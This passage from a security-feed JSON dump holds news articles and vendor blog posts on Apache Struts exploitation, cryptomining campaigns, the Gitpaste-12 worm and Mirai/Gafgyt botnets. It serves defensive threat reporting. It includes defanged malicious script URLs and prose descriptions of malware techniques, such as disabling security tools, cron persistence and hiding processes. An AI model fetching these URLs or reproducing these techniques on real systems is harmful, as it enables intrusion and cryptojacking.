There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a PowerShell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile the threat group is considered unsophisticated, researchers warn that it has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. 
So far, researchers estimate that Panda has made off with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>).\n\nResearchers first became aware of Panda in the summer of 2018 after the group engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. 
\u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and to leverage an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that its initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, few of its TTPs [tactics, techniques and procedures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. 
\u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nWhile swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administrators should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-06T17:40:51", "description": "Researchers have uncovered a new worm targeting Linux-based x86 servers, as well as Linux internet of things (IoT) devices (that are based on ARM and MIPS CPUs).\n\nOf note, the malware utilizes GitHub and Pastebin for housing malicious component code, and has at least 12 different attack modules available \u2013 leading researchers to call it \u201cGitpaste-12.\u201d It was first detected by Juniper Threat Labs in attacks on Oct. 15, 2020.\n\n\u201cNo malware is good to have, but worms are particularly annoying,\u201d said researchers with Juniper Threat Labs [in a Thursday post](<https://blogs.juniper.net/en-us/threat-research/gitpaste-12>). \u201cTheir ability to [spread in an automated fashion](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>) can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.\u201d\n\nThe first phase of the attack is the initial system compromise. The malware\u2019s various attack modules include 11 previously-disclosed vulnerabilities. 
That includes flaws in [Apache Struts (CVE-2017-5638)](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), Asus routers (CVE-2013-5948), Webadmin plugin for opendreambox (CVE-2017-14135) and [Tenda routers (CVE-2020-10987)](<https://threatpost.com/tenda-router-zero-days-spyware-botnet/159834/>).\n\nThe malware will attempt to use known exploits for these flaws to compromise systems and may also attempt to brute force passwords, said researchers. After compromising a system, a main shell script is then uploaded to the victim machine, and starts to download and execute other components of Gitpaste-12.\n\n## **The Malware**\n\nThis script sets up a cron job it downloads from Pastebin. Cron is a time-based job scheduler in Unix-like operating systems. The cron job calls a script and executes it again each minute; researchers believe that this script is presumably one mechanism by which updates can be pushed to the botnet.\n\nIt then downloads a script from GitHub (https://raw[.]githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it. The script contains comments in the Chinese language and has multiple commands available to attackers to disable different security capabilities. These include stripping the system\u2019s defenses, including firewall rules, SELinux (a security architecture for Linux systems), AppArmor (a Linux kernel security module that allows the system administrator to restrict programs\u2019 capabilities), as well as common attack prevention and monitoring software.\n\n(Image: The 11 vulnerabilities utilized for Gitpaste-12\u2019s initial attack vectors. Credit: Juniper Labs)\n\nThe malware also has some commands that disable cloud security agents, \u201cwhich clearly indicates the threat actor intends to target public cloud computing infrastructure provided by Alibaba Cloud and Tencent,\u201d said researchers.\n\nGitpaste-12 also features commands allowing it to run a cryptominer that targets the Monero cryptocurrency.\n\n\u201cIt also prevents administrators from collecting information about running processes by intercepting \u2018readdir\u2019 system calls and skipping directories for processes like tcpdump, sudo, openssl, etc. in \u2018/proc\u2019,\u201d said researchers. \u201cThe \u2018/proc\u2019 directory in Linux contains information about running processes. It is used, for example, by the \u2018ps\u2019 command to show information about running processes. But unfortunately for this threat actor, this implementation does not do what they expect it to do.\u201d\n\nFinally, the malware also contains a library (hide.so) that is loaded as LD_PRELOAD, which downloads and executes Pastebin files (https://pastebin[.]com/raw/Tg5FQHhf) that host further malicious code.\n\nResearchers said they reported the Pastebin URL, as well as the Git repo mentioned above that downloads malicious scripts for the malware. The Git repo was closed on Oct. 30, 2020. \u201cThis should stop the proliferation of this botnet,\u201d said researchers.\n\n## **Wormable Features**\n\nIn terms of its worming capabilities, Gitpaste-12 also contains a script that launches attacks against other machines, in an attempt to replicate and spread the malware.\n\n\u201cThe malware chooses a random /8 CIDR for attack and will try all addresses within that range,\u201d according to researchers. 
Classless Inter-Domain Routing (CIDR) is a method for allocating IP addresses and for IP routing; here it means that the attack targets every IP address within the randomly chosen /8 range.\n\nAnother version of the script also opens ports 30004 and 30005 for reverse shell commands, said researchers. Port 30004 uses the Transmission Control Protocol (TCP), which is one of the main protocols in TCP/IP networks, while port 30005 is typically associated with a bidirectional SOAP/HTTP-based protocol that provides communication between devices like routers or network switches and auto-configuration servers.\n\nWorms can have a widespread impact, [as seen in a 2019 campaign](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>) that exploited a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims\u2019 Linux systems, using a wormable exploit. Researchers said at the time that more than 3.5 million servers were at risk from the attacks.\n\nSeveral new worms have popped up in 2020 so far, [including the Golang worm](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>), which is aimed at installing cryptominers, and recently changed up its tactics to add attacks on Windows servers and a new pool of exploits to its bag of tricks.\n\nIn August, [a cryptomining worm](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) from the group known as TeamTNT was found spreading through the Amazon Web Services (AWS) cloud and collecting credentials. Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n", "cvss3": {}, "published": "2020-11-06T17:34:00", "type": "threatpost", "title": "Gitpaste-12 Worm Targets Linux Servers, IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5948", "CVE-2017-14135", "CVE-2017-5638", "CVE-2020-10987"], "modified": "2020-11-06T17:34:00", "id": "THREATPOST:7B2EAFA107D335014D553D78946C453E", "href": "https://threatpost.com/gitpaste-12-worm-linux-servers-iot-devices/161016/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source framework and library popular with enterprise developers and companies creating Java-based applications. 
Both of the exploitable vulnerabilities in question were fixed last November.\n\nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week](<https://github.com/cellanu/cve-2019-0230>) raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is an expression language for Java that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). 
The vulnerability affects the write permissions of file directories, which could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Struts Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according to the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests that security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and that they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:51:10", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday post](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>).\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. 
For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw 
(CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters passed to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. 
Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION>, and installs the update. After that, the botnet launches a BlackNurse DDoS attack, a method first disclosed in November 2016 that uses ICMP Type 3 Code 3 (destination unreachable, port unreachable) packets to drive up CPU load on the target.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Nigam told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of newly targeted vulnerabilities comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 
2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "cvss3": {}, "published": "2018-09-10T14:23:09", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "modified": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2017-12-28T17:52:36", "description": "As a web application firewall provider, part of our job at Imperva is constantly monitoring new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrate it into a single repository, and assess each vulnerability\u2019s priority. 
Having this kind of data puts us in a unique position to provide analysis of all web application vulnerabilities throughout the year, view trends and notice significant changes in the security landscape.\n\nAs we did [last year](<https://www.imperva.com/blog/2016/12/state-web-applications-vulnerabilities-2016/>), before we enter 2018, we took a look back at 2017 to understand the changes and trends in web application security over the past year.\n\nThis year we registered a record high number of web application vulnerabilities including well-known categories like [cross-site scripting](<https://www.imperva.com/app-security/threatglossary/cross-site-scripting-xss/>), but also new categories such as insecure [deserialization](<https://www.owasp.org/index.php/Deserialization_Cheat_Sheet>). In addition, the number of internet of things (IoT) vulnerabilities continued to grow and severely impact the security landscape. WordPress and PHP each continued to \u201cdominate\u201d in terms of vulnerabilities published in the content management system and server side technologies respectively. [Apache Struts vulnerabilities](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), although the framework is less popular in the market at large, had a huge effect and were claimed to be the root cause of one of the biggest security breaches in 2017.\n\n## 2017 Web Application Vulnerabilities Statistics\n\nOne of the first stats we review is quantity, meaning how many vulnerabilities were published in 2017 and how that number compares to previous years.\n\nFigure 1 shows the number of vulnerabilities on a monthly basis over the last two years. We can see that the overall number of new vulnerabilities in 2017 (14,082) increased significantly (212%) compared to 2016 (6,615). According to our data, more than 50% of web application vulnerabilities have a public exploit available to hackers. 
In addition, more than a third (36%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\nAs usual, cross-site scripting (Figure 2) vulnerabilities are the majority (8%) of 2017 web application vulnerabilities. In fact, their amount has doubled since 2016.\n\n_Figure 1: Number of web application vulnerabilities in 2016-2017_\n\n## OWASP Top 10 View\n\nThis year [OWASP released](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) their long awaited \u201cTop 10\u201d list, which included two new risks:\n\n### Insecure Deserialization\n\nSerialization is the process of translating data structures or object state into a format that can be stored (for example, in a file or memory buffer) or transmitted (for example, across a network connection link) and reconstructed later (deserialization). Serialization is widely used in RPC, HTTP, databases, etc.\n\nApplications and APIs may be vulnerable if they deserialize hostile or tampered objects supplied by an attacker without proper sanitization. Therefore, we thought it would be interesting to view the security vulnerabilities in light of these changes.\n\n_Figure 2: Number and type of OWASP Top 10 vulnerabilities 2014-2017_\n\nThe amount of deserialization vulnerabilities from 2016-2017 (Figure 2) increased substantially from previous years which may explain how they \u201cearned\u201d their spot in the new OWASP Top 10 list. Today, more and more applications and frameworks are using standard APIs to communicate. Some of these APIs take serialized objects and deserialize them in return, which can explain the growing trend of insecure deserialization vulnerabilities.\n\n### Insufficient Logging and Monitoring\n\nAttackers rely on the lack of monitoring and timely response to achieve their goals without being detected. We have not found any vulnerabilities published in 2017 that are directly related to this category. 
It will be interesting to monitor it and see if that will change next year.\n\n## The Rise of the (IoT) Machines\n\nNowadays nearly every aspect of our lives is connected to the internet and we can find smart devices everywhere\u2014in our home refrigerator, TV, lights, doors, locks and even the clothes we wear. These devices are designed to send and receive information and thus are usually connected to the internet at all times. In many cases the vendors of smart devices neglect to secure them properly or even \u201cbackdoor\u201d them on purpose in order to gain hidden access.\n\n \n_Figure 3: IoT vulnerabilities 2014-2017_\n\n2017 registered a record high of 104 IoT-related vulnerabilities (Figure 3), a huge increase relative to previous years. The rising trend in the amount of vulnerabilities can be associated with their increasing popularity in our modern lives and advances in IoT technology that make IoT devices cheaper and accessible to more people.\n\nOne of the most popular vulnerability types in IoT devices (35%) is using default or easy to guess credentials in order to gain access to the device and take control of it. Once the device is controlled by the attacker it can be used to mount any kind of attack. Earlier this year the well-known [Mirai malware used this kind of vulnerability](<https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html>) (default credentials) to spread itself through the network. 
Once the malware gained access to the device, it turned it into a remote-controlled bot that was used as part of a huge DDoS attack.\n\n## Content Management Systems\n\nWhen analyzing content management system (CMS) frameworks, we decided to concentrate on the four leading platforms that account for [60% of the market share](<https://w3techs.com/technologies/overview/content_management/all>)\u2014WordPress, Joomla, Drupal and Magento.\n\n_Figure 4: Number of vulnerabilities by CMS platform 2016-2017_\n\n### WordPress\n\nAs expected, WordPress vulnerabilities continue to be the lion\u2019s share of all CMS-related vulnerabilities. In fact, WordPress vulnerabilities (418) have increased by ~400% since 2016 (Figure 4).\n\nFurther analysis of WordPress vulnerabilities showed that 75% of the 2017 vulnerabilities originated from third-party vendor plug-ins (Figure 5).\n\n_Figure 5: WordPress third party vendor vulnerabilities in 2017_\n\nThe rise in the number of vulnerabilities can be explained by the growth of WordPress (Figure 6) and because [third party plug-in](<https://www.wpwhitesecurity.com/wordpress-security/statistics-highlight-main-source-wordpress-vulnerabilities/>) code is notorious for its poor security.\n\n**Year** | **Number of WordPress Plug-ins** \n---|--- \n**2015** | 41,347 \n**2016** | 48,044 \n**2017** | 53,357 \n \n_Figure 6: WordPress plug-in's trend_\n\n## Server-side Technologies\n\nPHP is still the most prevalent server-side language, therefore it\u2019s expected to be associated with the highest number of vulnerabilities. In 2017, 44 vulnerabilities in PHP were published (Figure 7), a decrease of roughly 59% from the 107 PHP vulnerabilities published in 2016. At the end of 2015, PHP released a major version, 7.0, after almost a year and half with no updates, which can explain the growth in the number of vulnerabilities in 2016. 
Last year PHP released a minor version, 7.1 (December 2016), with slight changes which can explain the decrease in the number of vulnerabilities in 2017.\n\n_Figure 7: Top server-side technology vulnerabilities 2014-2017_\n\n## The Year of Apache Struts\n\nAlthough 2017 listed fewer vulnerabilities in the Apache Struts framework (Figure 8), their impact was huge as some of them included unauthenticated [remote code execution](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) (RCE) which basically means that anyone can hack and take over the server, access private information and more.\n\n_Figure 8: Apache Struts and remote code execution vulnerabilities in 2014-2017_\n\nWe have previously blogged about this [specific vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) and [multiple other Apache Struts](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) vulnerabilities in detail. They\u2019re worth checking out if you haven\u2019t already.\n\n## Predictions Toward 2018\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are a couple of possible vulnerabilities trends for 2018:\n\n * Cross-site scripting vulnerabilities will continue to lead mainly because of the rise of [cryptojacking](<https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/>) and the increasing popularity of server-side technologies that utilize JavaScript (e.g., Node.JS).\n * More authentication-related vulnerabilities from the family of \u201cdefault/guessable credentials\u201d will be discovered (especially in IoT devices) and exploited in order to herd new botnets. 
These botnets can be used to mount any kind of large scale attacks\u2014DDoS, brute force and more.\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a [web application firewall](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) (WAF). A WAF may be either on-premises, in the cloud or [a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>) depending on your needs and infrastructure.\n\nAs organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security [requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). A solution supported by a dedicated security team is an important requirement to add to your selection criteria. Dedicated security teams are able to push timely security updates to a WAF in order to properly defend your assets.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-28T17:20:47", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-12-28T17:20:47", "id": "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "href": "https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T19:52:24", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for 